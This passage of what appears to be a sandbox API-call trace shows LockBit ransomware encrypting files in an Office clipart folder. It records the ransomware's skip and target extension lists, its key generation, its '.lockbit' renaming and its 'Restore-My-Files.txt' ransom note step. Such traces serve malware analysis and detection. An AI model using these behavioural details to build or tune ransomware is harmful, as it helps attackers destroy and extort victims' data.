lpString2=".WMF") returned -1 [0146.992] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0146.992] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0146.992] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0146.992] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0146.992] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0146.992] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0146.992] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0146.992] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0146.992] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0146.992] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0146.992] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0146.992] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0146.992] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0146.993] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0146.993] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0146.993] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0146.993] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0146.993] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0146.993] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0146.993] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0146.993] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0146.993] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0146.993] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.993] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0146.993] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0146.993] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0146.993] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0146.993] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0146.993] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0146.993] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0146.993] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0146.993] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0146.993] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0146.993] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0146.993] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0146.994] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0146.994] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0146.994] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0146.994] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0146.994] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0146.994] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.994] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0146.994] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0146.994] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0146.994] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0146.994] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0158477.WMF") returned 1 [0146.994] lstrcmpiW (lpString1="ntldr", lpString2="J0158477.WMF") returned 1 [0146.994] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0158477.WMF") returned 1 [0146.994] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0158477.WMF") returned -1 [0146.994] lstrcmpiW (lpString1="autorun.inf", lpString2="J0158477.WMF") returned -1 [0146.994] lstrcmpiW (lpString1="thumbs.db", lpString2="J0158477.WMF") returned 1 [0146.994] lstrcmpiW (lpString1="iconcache.db", lpString2="J0158477.WMF") returned -1 [0146.994] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0146.994] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158477.WMF") returned=".WMF" [0146.994] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0146.994] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0146.994] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0146.995] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0146.995] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0146.995] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0146.995] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0146.995] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0146.995] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0146.995] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0146.995] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0146.995] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0146.995] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0146.995] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0146.995] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0146.995] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0146.995] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0146.995] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0146.995] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0146.995] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0146.995] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0146.995] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0146.995] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0146.995] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0146.995] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0146.996] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0146.996] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0146.996] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0146.996] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158477.WMF.lockbit") returned 72 [0146.996] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158477.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0158477.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0147.001] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0147.001] malloc (_Size=0x40068) returned 0x1ff1e60 [0147.001] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=17966) returned 1 [0147.001] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.002] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.002] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0147.002] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.002] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.002] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0147.002] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0147.005] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158477.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158477.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0147.005] malloc (_Size=0xa6) returned 0x1fa2ed8 [0147.006] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0147.007] free (_Block=0x1fa2ed8) [0147.007] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158477.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0147.007] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0147.007] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0147.007] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56478790, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x72de, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0160590.WMF", cAlternateFileName="")) returned 1 [0147.011] lstrcmpiW (lpString1=".", lpString2="J0160590.WMF") returned -1 [0147.011] lstrcmpiW (lpString1="..", lpString2="J0160590.WMF") returned -1 [0147.011] PathFindExtensionW (pszPath="J0160590.WMF") returned=".WMF" [0147.011] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0147.011] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0147.012] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0147.012] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0147.012] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0147.012] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0147.012] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0147.012] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0147.012] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0147.012] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0147.012] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0147.012] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0147.012] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0147.012] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0147.012] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0147.012] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0147.012] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0147.012] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0147.012] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0147.012] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0147.012] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0147.013] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0147.013] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0147.013] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0147.013] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.013] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0147.013] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0147.013] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0147.013] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0147.013] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0147.013] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0147.013] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0147.013] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0147.013] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0147.013] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0147.013] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0147.013] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0147.013] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0147.013] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0147.013] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0147.013] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0147.014] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0147.014] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.014] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0147.014] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0147.014] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0147.014] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0147.014] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0160590.WMF") returned 1 [0147.014] lstrcmpiW (lpString1="ntldr", lpString2="J0160590.WMF") returned 1 [0147.014] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0160590.WMF") returned 1 [0147.014] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0160590.WMF") returned -1 [0147.014] lstrcmpiW (lpString1="autorun.inf", lpString2="J0160590.WMF") returned -1 [0147.014] lstrcmpiW (lpString1="thumbs.db", lpString2="J0160590.WMF") returned 1 [0147.014] lstrcmpiW (lpString1="iconcache.db", lpString2="J0160590.WMF") returned -1 [0147.014] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0147.014] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0160590.WMF") returned=".WMF" [0147.014] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0147.014] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0147.014] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0147.014] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0147.014] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0147.015] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0147.015] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0147.015] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0147.015] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0147.015] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0147.015] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0147.015] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0147.015] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0147.015] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0147.015] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0147.015] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0147.015] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0147.015] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0147.015] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0147.015] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0147.015] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0147.015] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0147.015] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0147.015] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0147.015] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0147.016] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0147.016] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0147.016] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0147.016] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0160590.WMF.lockbit") returned 72 [0147.016] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0160590.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0160590.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0147.019] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0147.019] malloc (_Size=0x40068) returned 0x3df0008 [0147.019] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=29406) returned 1 [0147.019] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.020] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.020] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0147.020] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.020] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.020] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0147.020] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0147.022] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0160590.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0160590.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0147.022] malloc (_Size=0xa6) returned 0x1fa2ed8 [0147.022] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0147.034] free (_Block=0x1fa2ed8) [0147.034] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0160590.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0147.034] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0147.034] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0147.034] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5649e8f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xb594, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0164153.JPG", cAlternateFileName="")) returned 1 [0147.035] lstrcmpiW (lpString1=".", lpString2="J0164153.JPG") returned -1 [0147.035] lstrcmpiW (lpString1="..", lpString2="J0164153.JPG") returned -1 [0147.035] PathFindExtensionW (pszPath="J0164153.JPG") returned=".JPG" [0147.035] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0147.035] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0147.035] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0147.035] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0147.035] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0147.035] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0147.035] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0147.035] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0147.035] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0147.035] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0147.035] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0147.035] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0147.035] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0147.035] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0147.035] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0147.035] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0147.035] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0147.035] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0147.036] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0147.036] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0147.036] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0147.036] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0147.036] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0147.036] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0147.036] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0147.036] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0147.036] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0147.036] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0147.036] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0147.036] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0147.036] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0147.036] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0147.036] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0147.036] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0147.036] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0147.037] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0147.037] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0147.037] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0147.037] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0147.037] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0147.037] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0147.037] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0147.037] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0147.037] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0147.037] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0147.037] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0147.037] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0147.037] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0164153.JPG") returned 1 [0147.037] lstrcmpiW (lpString1="ntldr", lpString2="J0164153.JPG") returned 1 [0147.037] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0164153.JPG") returned 1 [0147.037] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0164153.JPG") returned -1 [0147.037] lstrcmpiW (lpString1="autorun.inf", lpString2="J0164153.JPG") returned -1 [0147.037] lstrcmpiW (lpString1="thumbs.db", lpString2="J0164153.JPG") returned 1 [0147.037] lstrcmpiW (lpString1="iconcache.db", lpString2="J0164153.JPG") returned -1 [0147.037] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0147.037] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0164153.JPG") returned=".JPG" [0147.038] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0147.038] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0147.038] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0147.038] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0147.038] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0147.038] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0147.038] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0147.038] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0147.038] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0147.038] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0147.038] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0147.038] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0147.038] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0147.038] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0147.038] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0147.038] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0147.038] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0147.038] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0147.038] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0147.038] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0147.038] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0147.038] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0147.039] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0147.039] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0147.039] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0147.039] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0147.039] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0147.039] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0147.039] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0164153.JPG.lockbit") returned 72 [0147.039] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft 